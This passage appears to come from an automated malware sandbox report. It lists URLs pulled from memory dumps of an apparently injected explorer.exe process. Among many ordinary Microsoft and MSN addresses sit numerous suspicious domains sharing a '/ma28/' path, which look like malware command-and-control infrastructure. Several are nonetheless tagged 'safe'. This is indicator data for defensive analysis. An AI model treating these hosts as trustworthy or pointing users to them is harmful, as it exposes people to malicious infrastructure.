                                              		unknown
                                              https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUYexplorer.exe, 00000002.00000000.1688723563.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4132184132.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                		high
                                                http://www.hetangosalon.net/ma28/explorer.exe, 00000002.00000003.3453705418.000000000CB55000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4140801025.000000000CB09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105523604.000000000CB55000.00000004.00000001.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-darkexplorer.exe, 00000002.00000000.1688723563.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4132184132.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://www.loverhoodie.shop/ma28/explorer.exe, 00000002.00000003.3453705418.000000000CB55000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4140801025.000000000CB09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105523604.000000000CB55000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.9-club.storeexplorer.exe, 00000002.00000003.3453705418.000000000CB55000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4140801025.000000000CB09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105523604.000000000CB55000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svgexplorer.exe, 00000002.00000002.4132184132.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000002.00000003.3106571769.000000000C9B4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106066159.000000000C99D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1694937333.000000000C964000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105712174.000000000C970000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://wns.windows.com/Lexplorer.exe, 00000002.00000000.1694937333.000000000C557000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4139053792.000000000C557000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://word.office.comexplorer.exe, 00000002.00000002.4139053792.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1694937333.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://www.odgerlazerhats.netReferer:explorer.exe, 00000002.00000003.3453705418.000000000CB55000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4140801025.000000000CB09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105523604.000000000CB55000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.vjoami3.xyzReferer:explorer.exe, 00000002.00000003.3453705418.000000000CB55000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4140801025.000000000CB09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105523604.000000000CB55000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earningsexplorer.exe, 00000002.00000002.4132184132.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZuexplorer.exe, 00000002.00000000.1688723563.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4132184132.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://www.9-club.store/ma28/explorer.exe, 00000002.00000003.3453705418.000000000CB55000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4140801025.000000000CB09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105523604.000000000CB55000.00000004.00000001.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-winexplorer.exe, 00000002.00000000.1688723563.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4132184132.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://www.iaokoa.net/ma28/explorer.exe, 00000002.00000003.3453705418.000000000CB55000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4140801025.000000000CB09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105523604.000000000CB55000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000002.00000000.1688723563.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4132184132.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://schemas.micrexplorer.exe, 00000002.00000000.1696576588.000000000CA63000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106099982.000000000CA64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4140661866.000000000CA66000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://www.nfluencer-marketing-83144.bondexplorer.exe, 00000002.00000003.3453705418.000000000CB55000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4140801025.000000000CB09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105523604.000000000CB55000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-explorer.exe, 00000002.00000000.1688723563.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4132184132.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://www.fricaduka.store/ma28/www.iralcity.storeexplorer.exe, 00000002.00000003.3453705418.000000000CB55000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4140801025.000000000CB09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105523604.000000000CB55000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeuexplorer.exe, 00000002.00000000.1688723563.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4132184132.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://www.itchen-design-87997.bondReferer:explorer.exe, 00000002.00000003.3453705418.000000000CB55000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4140801025.000000000CB09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105523604.000000000CB55000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        http://www.liopew.xyzexplorer.exe, 00000002.00000003.3453705418.000000000CB55000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4140801025.000000000CB09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105523604.000000000CB55000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-darkexplorer.exe, 00000002.00000000.1688723563.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4132184132.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://www.rd.com/list/polite-habits-campers-dislike/explorer.exe, 00000002.00000000.1688723563.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4132184132.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://www.itchen-design-87997.bond/ma28/explorer.exe, 00000002.00000003.3453705418.000000000CB55000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4140801025.000000000CB09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105523604.000000000CB55000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            http://www.iddyspiderish.lifeexplorer.exe, 00000002.00000003.3453705418.000000000CB55000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4140801025.000000000CB09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105523604.000000000CB55000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            http://www.odgerlazerhats.netexplorer.exe, 00000002.00000003.3453705418.000000000CB55000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4140801025.000000000CB09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105523604.000000000CB55000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://android.notify.windows.com/iOSexplorer.exe, 00000002.00000002.4139053792.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1694937333.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://www.ryptocurrency-22237.bond/ma28/www.iaokoa.netexplorer.exe, 00000002.00000003.3453705418.000000000CB55000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4140801025.000000000CB09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105523604.000000000CB55000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.imgexplorer.exe, 00000002.00000000.1688723563.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4132184132.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://www.iaokoa.net/ma28/www.odgerlazerhats.netexplorer.exe, 00000002.00000003.3453705418.000000000CB55000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4140801025.000000000CB09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105523604.000000000CB55000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                http://www.odgerlazerhats.net/ma28/explorer.exe, 00000002.00000003.3453705418.000000000CB55000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4140801025.000000000CB09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105523604.000000000CB55000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                http://www.hetangosalon.netReferer:explorer.exe, 00000002.00000003.3453705418.000000000CB55000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4140801025.000000000CB09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105523604.000000000CB55000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                https://outlook.com_explorer.exe, 00000002.00000002.4139053792.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1694937333.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppeexplorer.exe, 00000002.00000000.1688723563.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4132184132.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-atexplorer.exe, 00000002.00000000.1688723563.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4132184132.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      http://www.fricaduka.store/ma28/explorer.exe, 00000002.00000003.3453705418.000000000CB55000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4140801025.000000000CB09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105523604.000000000CB55000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      		unknown
                                                                                      http://www.itchen-design-87997.bond/ma28/www.hetangosalon.netexplorer.exe, 00000002.00000003.3453705418.000000000CB55000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4140801025.000000000CB09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105523604.000000000CB55000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      		unknown
                                                                                      http://schemas.miexplorer.exe, 00000002.00000000.1696576588.000000000CA63000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106099982.000000000CA64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4140661866.000000000CA66000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-clexplorer.exe, 00000002.00000002.4132184132.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          http://www.hetangosalon.netexplorer.exe, 00000002.00000003.3453705418.000000000CB55000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4140801025.000000000CB09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105523604.000000000CB55000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          		unknown
                                                                                          https://powerpoint.office.comcemberexplorer.exe, 00000002.00000002.4139053792.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1694937333.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            http://www.vjoami3.xyzexplorer.exe, 00000002.00000003.3453705418.000000000CB55000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4140801025.000000000CB09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105523604.000000000CB55000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
                                                                                            http://www.vjoami3.xyz/ma28/www.ryptocurrency-22237.bondexplorer.exe, 00000002.00000003.3453705418.000000000CB55000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4140801025.000000000CB09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105523604.000000000CB55000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
                                                                                            https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-explorer.exe, 00000002.00000000.1688723563.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4132184132.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              http://www.liopew.xyzReferer:explorer.exe, 00000002.00000003.3453705418.000000000CB55000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4140801025.000000000CB09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105523604.000000000CB55000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              		unknown
                                                                                              http://www.hgevb.info/ma28/www.9-club.storeexplorer.exe, 00000002.00000003.3453705418.000000000CB55000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4140801025.000000000CB09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105523604.000000000CB55000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              		unknown
                                                                                              http://www.iddyspiderish.life/ma28/explorer.exe, 00000002.00000003.3453705418.000000000CB55000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4140801025.000000000CB09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105523604.000000000CB55000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              		unknown
                                                                                              http://schemas.microexplorer.exe, 00000002.00000000.1690797571.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000002.4133618844.0000000007F40000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.1693239826.0000000009B60000.00000002.00000001.00040000.00000000.sdmpfalse
                                                                                                		high
                                                                                                http://www.loverhoodie.shopReferer:explorer.exe, 00000002.00000003.3453705418.000000000CB55000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4140801025.000000000CB09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105523604.000000000CB55000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                		unknown
                                                                                                http://www.nfluencer-marketing-83144.bond/ma28/wShexplorer.exe, 00000002.00000003.3453705418.000000000CB55000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4140801025.000000000CB09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105523604.000000000CB55000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                		unknown
                                                                                                http://www.iralcity.storeReferer:explorer.exe, 00000002.00000003.3453705418.000000000CB55000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4140801025.000000000CB09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105523604.000000000CB55000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                		unknown
                                                                                                https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000002.00000000.1688723563.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4132184132.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-miexplorer.exe, 00000002.00000000.1688723563.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4132184132.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://api.msn.com/qexplorer.exe, 00000002.00000000.1691972906.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3107468764.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4134891449.00000000097D4000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&ocexplorer.exe, 00000002.00000000.1688723563.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4132184132.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        http://www.liopew.xyz/ma28/www.hgevb.infoexplorer.exe, 00000002.00000003.3453705418.000000000CB55000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4140801025.000000000CB09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105523604.000000000CB55000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        		unknown
                                                                                                        http://www.nfluencer-marketing-83144.bondReferer:explorer.exe, 00000002.00000003.3453705418.000000000CB55000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4140801025.000000000CB09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105523604.000000000CB55000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        		unknown
                                                                                                        https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1explorer.exe, 00000002.00000000.1688723563.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4132184132.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          http://www.olconsulting.xyzexplorer.exe, 00000002.00000003.3453705418.000000000CB55000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4140801025.000000000CB09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105523604.000000000CB55000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          		unknown
                                                                                                          https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svgexplorer.exe, 00000002.00000002.4132184132.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-darkexplorer.exe, 00000002.00000000.1688723563.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4132184132.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-Aexplorer.exe, 00000002.00000000.1688723563.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1688723563.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4132184132.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4132184132.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                http://www.hetangosalon.net/ma28/www.loverhoodie.shopexplorer.exe, 00000002.00000003.3453705418.000000000CB55000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4140801025.000000000CB09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105523604.000000000CB55000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                http://www.vjoami3.xyz/ma28/explorer.exe, 00000002.00000003.3453705418.000000000CB55000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4140801025.000000000CB09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105523604.000000000CB55000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                http://www.hgevb.infoReferer:explorer.exe, 00000002.00000003.3453705418.000000000CB55000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4140801025.000000000CB09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105523604.000000000CB55000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                http://www.iaokoa.netexplorer.exe, 00000002.00000003.3453705418.000000000CB55000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4140801025.000000000CB09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105523604.000000000CB55000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                http://www.fricaduka.storeReferer:explorer.exe, 00000002.00000003.3453705418.000000000CB55000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4140801025.000000000CB09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105523604.000000000CB55000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                http://www.olconsulting.xyzReferer:explorer.exe, 00000002.00000003.3453705418.000000000CB55000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4140801025.000000000CB09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105523604.000000000CB55000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                http://www.ryptocurrency-22237.bondexplorer.exe, 00000002.00000003.3453705418.000000000CB55000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4140801025.000000000CB09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105523604.000000000CB55000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                http://www.loverhoodie.shop/ma28/www.vjoami3.xyzexplorer.exe, 00000002.00000003.3453705418.000000000CB55000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4140801025.000000000CB09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105523604.000000000CB55000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                http://www.ueijodeminasoriginal.shopReferer:explorer.exe, 00000002.00000003.3453705418.000000000CB55000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4140801025.000000000CB09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105523604.000000000CB55000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                http://www.odgerlazerhats.net/ma28/www.olconsulting.xyzexplorer.exe, 00000002.00000003.3453705418.000000000CB55000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4140801025.000000000CB09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105523604.000000000CB55000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                http://www.itchen-design-87997.bondexplorer.exe, 00000002.00000003.3453705418.000000000CB55000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4140801025.000000000CB09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105523604.000000000CB55000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headereventexplorer.exe, 00000002.00000000.1688723563.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4132184132.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  http://www.iaokoa.netReferer:explorer.exe, 00000002.00000003.3453705418.000000000CB55000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4140801025.000000000CB09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105523604.000000000CB55000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  		unknown
                                                                                                                  http://www.fricaduka.storeexplorer.exe, 00000002.00000003.3453705418.000000000CB55000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4140801025.000000000CB09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105523604.000000000CB55000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  		unknown
                                                                                                                  http://www.iddyspiderish.lifeReferer:explorer.exe, 00000002.00000003.3453705418.000000000CB55000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4140801025.000000000CB09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105523604.000000000CB55000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  		unknown
